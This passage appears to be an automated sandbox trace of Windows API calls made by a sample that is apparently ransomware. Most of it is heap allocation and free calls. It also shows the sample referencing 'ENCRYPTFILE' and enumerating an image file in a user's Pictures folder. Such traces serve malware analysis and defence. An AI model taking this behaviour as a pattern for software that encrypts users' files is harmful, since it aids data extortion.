lpMem=0x41ac700 | out: hHeap=0x1780000) returned 1 [0093.899] PeekMessageW (in: lpMsg=0x144f2dc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f2dc) returned 0 [0093.899] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a8c30 | out: hHeap=0x1780000) returned 1 [0093.899] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9fe0 | out: hHeap=0x1780000) returned 1 [0093.899] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca028 | out: hHeap=0x1780000) returned 1 [0093.899] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca040 | out: hHeap=0x1780000) returned 1 [0093.899] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2490 | out: hHeap=0x1780000) returned 1 [0093.899] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf7c0 | out: hHeap=0x1780000) returned 1 [0093.899] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca0e8 | out: hHeap=0x1780000) returned 1 [0093.899] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e23f0 | out: hHeap=0x1780000) returned 1 [0093.899] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf798 | out: hHeap=0x1780000) returned 1 [0093.899] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x42da858 | out: hHeap=0x1780000) returned 1 [0093.900] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e23d0 | out: hHeap=0x1780000) returned 1 [0093.900] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca160 | out: hHeap=0x1780000) returned 1 [0093.900] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9fc8 | out: hHeap=0x1780000) returned 1 [0093.900] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf658 | out: hHeap=0x1780000) returned 1 [0093.900] PeekMessageW (in: lpMsg=0x144f534, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f534) returned 0 [0093.900] PeekMessageW (in: lpMsg=0x144f534, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f534) returned 0 [0093.900] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e24f0 [0093.900] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf450 [0093.900] CharUpperBuffW (in: lpsz="ENCRYPTFILE", cchLength=0xb | out: lpsz="ENCRYPTFILE") returned 0xb [0093.900] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf450 | out: hHeap=0x1780000) returned 1 [0093.900] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e24f0 | out: hHeap=0x1780000) returned 1 [0093.900] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf658 [0093.900] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e2410 [0093.900] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf798 [0093.900] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9e90 [0093.900] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2340 [0093.900] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9f98 [0093.900] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e23d0 [0093.900] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1796fc8 [0093.900] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca130 [0093.900] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2360 [0093.900] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x50) returned 0x4369f80 [0093.900] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca130 | out: hHeap=0x1780000) returned 1 [0093.900] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2490 [0093.901] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2490 | out: hHeap=0x1780000) returned 1 [0093.901] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9fc8 [0093.901] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc0) returned 0x1b22250 [0093.901] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4369f80 | out: hHeap=0x1780000) returned 1 [0093.901] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9fc8 | out: hHeap=0x1780000) returned 1 [0093.901] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796fc8 | out: hHeap=0x1780000) returned 1 [0093.901] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e23d0 | out: hHeap=0x1780000) returned 1 [0093.901] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2340 | out: hHeap=0x1780000) returned 1 [0093.901] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43ca040 [0093.901] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf7c0 [0093.901] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9f68 [0093.901] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e23e0 [0093.901] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9fc8 [0093.901] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9ff8 [0093.901] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a9188 [0093.901] PeekMessageW (in: lpMsg=0x144f2dc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f2dc) returned 0 [0093.901] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e23d0 [0093.901] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e23f0 [0093.901] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1796fc8 [0093.901] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796fc8 | out: hHeap=0x1780000) returned 1 [0093.901] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e23f0 | out: hHeap=0x1780000) returned 1 [0093.901] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e23d0 | out: hHeap=0x1780000) returned 1 [0093.901] PeekMessageW (in: lpMsg=0x144f2dc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f2dc) returned 0 [0093.901] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e24b0 [0093.902] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf428 [0093.902] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9ed8 [0093.902] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2490 [0093.902] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9f08 [0093.902] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2490 | out: hHeap=0x1780000) returned 1 [0093.902] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Pictures\\cLIkSZ\\fgq5EW8t8.jpg", lpFindFileData=0x144ee20 | out: lpFindFileData=0x144ee20*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1f3fff20, ftCreationTime.dwHighDateTime=0x1d5f02d, ftLastAccessTime.dwLowDateTime=0x3197eae0, ftLastAccessTime.dwHighDateTime=0x1d5ee7d, ftLastWriteTime.dwLowDateTime=0x3197eae0, ftLastWriteTime.dwHighDateTime=0x1d5ee7d, nFileSizeHigh=0x0, nFileSizeLow=0x244f, dwReserved0=0x10189fc, dwReserved1=0x8, cFileName="fgq5EW8t8.jpg", cAlternateFileName="FGQ5EW~1.JPG")) returned 0x41ac780 [0093.902] FindClose (in: hFindFile=0x41ac780 | out: hFindFile=0x41ac780) returned 1 [0093.902] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9f08 | out: hHeap=0x1780000) returned 1 [0093.902] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9ed8 | out: hHeap=0x1780000) returned 1 [0093.902] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf428 | out: hHeap=0x1780000) returned 1 [0093.902] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2510 [0093.902] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1796fc8 [0093.902] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e23d0 [0093.902] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x30) returned 0x4391e38 [0093.902] CharUpperBuffW (in: lpsz="_WINAPI_FILEINUSE", cchLength=0x11 | out: lpsz="_WINAPI_FILEINUSE") returned 0x11 [0093.902] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4391e38 | out: hHeap=0x1780000) returned 1 [0093.903] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e23d0 | out: hHeap=0x1780000) returned 1 [0093.903] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf428 [0093.903] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e23d0 [0093.903] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf450 [0093.903] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9fe0 [0093.903] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2520 [0093.903] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9ed8 [0093.903] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2520 | out: hHeap=0x1780000) returned 1 [0093.903] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43c9f08 [0093.903] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfa68 [0093.903] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca028 [0093.903] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2490 [0093.903] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca028 | out: hHeap=0x1780000) returned 1 [0093.903] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf8b0 [0093.903] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca070 [0093.903] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca028 [0093.903] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a9338 [0093.903] PeekMessageW (in: lpMsg=0x144eebc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144eebc) returned 0 [0093.903] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf950 [0093.903] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca178 [0093.903] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e24c0 [0093.903] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca058 [0093.903] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca0a0 [0093.903] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e23f0 [0093.904] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca0a0 | out: hHeap=0x1780000) returned 1 [0093.904] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2400 [0093.904] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x30) returned 0x4391ab8 [0093.904] CharUpperBuffW (in: lpsz="_WINAPI_CREATEFILEEX", cchLength=0x14 | out: lpsz="_WINAPI_CREATEFILEEX") returned 0x14 [0093.904] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4391ab8 | out: hHeap=0x1780000) returned 1 [0093.904] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2400 | out: hHeap=0x1780000) returned 1 [0093.904] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf860 [0093.904] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e2400 [0093.904] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfae0 [0093.904] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca130 [0093.904] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e24f0 [0093.904] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9f20 [0093.904] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e24f0 | out: hHeap=0x1780000) returned 1 [0093.904] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e24a0 [0093.904] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9f38 [0093.904] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e24d0 [0093.904] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e24d0 | out: hHeap=0x1780000) returned 1 [0093.904] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e24d0 [0093.904] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9f50 [0093.904] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2520 [0093.904] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2520 | out: hHeap=0x1780000) returned 1 [0093.904] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43ca0a0 [0093.904] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfb80 [0093.904] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca0e8 [0093.905] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e24f0 [0093.905] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca0e8 | out: hHeap=0x1780000) returned 1 [0093.905] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf900 [0093.905] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca0e8 [0093.905] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca100 [0093.905] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfd10 [0093.905] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca118 [0093.905] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2520 [0093.905] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca118 | out: hHeap=0x1780000) returned 1 [0093.905] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfd38 [0093.905] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca118 [0093.905] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfb08 [0093.905] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca148 [0093.905] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2330 [0093.905] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca160 [0093.905] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2340 [0093.905] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2340 | out: hHeap=0x1780000) returned 1 [0093.905] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfba8 [0093.905] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca310 [0093.905] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2340 [0093.905] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca358 [0093.905] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2650 [0093.905] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2650 | out: hHeap=0x1780000) returned 1 [0093.906] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf888 [0093.906] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca1a8 [0093.906] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e25e0 [0093.906] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca1a8 | out: hHeap=0x1780000) returned 1 [0093.906] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x30) returned 0x4391ee0 [0093.906] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca220 [0093.906] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2640 [0093.906] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2640 | out: hHeap=0x1780000) returned 1 [0093.906] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf8d8 [0093.906] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca3b8 [0093.906] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2720 [0093.906] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca3b8 | out: hHeap=0x1780000) returned 1 [0093.906] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfbf8 [0093.906] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca3b8 [0093.906] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2650 [0093.906] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2650 | out: hHeap=0x1780000) returned 1 [0093.906] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfc48 [0093.906] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca478 [0093.906] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2610 [0093.906] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca478 | out: hHeap=0x1780000) returned 1 [0093.906] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf978 [0093.906] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca478 [0093.906] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a8ac8 [0093.906] PeekMessageW (in: lpMsg=0x144e9a4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e9a4) returned 0 [0093.907] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfab8 [0093.907] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca1a8 [0093.907] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2630 [0093.907] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca208 [0093.907] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca718 [0093.907] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2680 [0093.907] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca718 | out: hHeap=0x1780000) returned 1 [0093.907] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfa90 [0093.907] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca718 [0093.907] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2590 [0093.907] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca4c0 [0093.907] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2590 | out: hHeap=0x1780000) returned 1 [0093.907] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca778 [0093.907] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2550 [0093.907] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca550 [0093.907] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2550 | out: hHeap=0x1780000) returned 1 [0093.907] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca490 [0093.907] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e26c0 [0093.907] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca4d8 [0093.907] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26c0 | out: hHeap=0x1780000) returned 1 [0093.907] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca4f0 [0093.907] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e26f0 [0093.907] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca508 [0093.907] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26f0 | out: hHeap=0x1780000) returned 1 [0093.907] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca5c8 [0093.907] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2640 [0093.907] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca5e0 [0093.908] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2640 | out: hHeap=0x1780000) returned 1 [0093.908] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca670 [0093.908] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e26c0 [0093.908] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca7d8 [0093.908] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26c0 | out: hHeap=0x1780000) returned 1 [0093.908] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca7a8 [0093.908] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2550 [0093.908] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2550 | out: hHeap=0x1780000) returned 1 [0093.908] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca9a0 [0093.908] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2590 [0093.908] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca9e8 [0093.908] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2590 | out: hHeap=0x1780000) returned 1 [0093.908] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a8be8 [0093.908] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfa90 | out: hHeap=0x1780000) returned 1 [0093.908] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca838 [0093.908] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e26d0 [0093.908] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26d0 | out: hHeap=0x1780000) returned 1 [0093.908] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca880 [0093.908] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2660 [0093.908] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca868 [0093.908] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2660 | out: hHeap=0x1780000) returned 1 [0093.908] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca8b0 [0093.908] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2700 [0093.908] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2700 | out: hHeap=0x1780000) returned 1 [0093.908] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca7f0 [0093.908] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e26e0 [0093.908] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca898 [0093.908] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26e0 | out: hHeap=0x1780000) returned 1 [0093.909] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca988 [0093.909] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e25c0 [0093.909] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25c0 | out: hHeap=0x1780000) returned 1 [0093.909] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caa18 [0093.909] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2670 [0093.909] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca940 [0093.909] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2670 | out: hHeap=0x1780000) returned 1 [0093.909] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca790 [0093.909] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e26c0 [0093.909] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26c0 | out: hHeap=0x1780000) returned 1 [0093.909] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca970 [0093.909] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e26a0 [0093.909] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca910 [0093.909] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26a0 | out: hHeap=0x1780000) returned 1 [0093.909] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x80) returned 0x41a5250 [0093.909] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a8be8 | out: hHeap=0x1780000) returned 1 [0093.909] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca7c0 [0093.909] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2640 